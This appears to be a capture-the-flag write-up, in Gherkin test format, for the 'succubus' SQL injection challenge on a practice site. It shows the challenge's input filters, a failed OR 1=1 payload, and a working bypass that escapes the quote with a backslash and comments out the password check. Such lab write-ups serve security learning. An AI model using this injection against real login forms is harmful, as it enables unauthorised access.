## Version 2.0
## language: en

Feature: succubus-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | Windows         | 10 Pro              |
  | Firefox         | 74.0 (64-bit)       |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/succubus_37568a99f12e6bd2f097e8038f74d768.php
    """
    When I open the url with Firefox
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_succubus where id='' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    SUCCUBUS Clear!
    """
    When I try with the well known payload:
    """
    pw=' OR 1 = 1
    """
    Then I get "No Hack ~_~"

   Scenario: Success:Sqli-comment-technique
    Given I inspect the code one more time
    And I see that they validate some strings to avoid union sqli
    And also validates the single quote character
    """
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    if(preg_match('/\'/',$_GET[id])) exit("HeHe");
    if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
    """
    When I use a comment and a backslash to bypass the control
    And a well known payload
    """
    ?id=admin\'&pw= or 1=1--
    """
    Then I solve the challenge
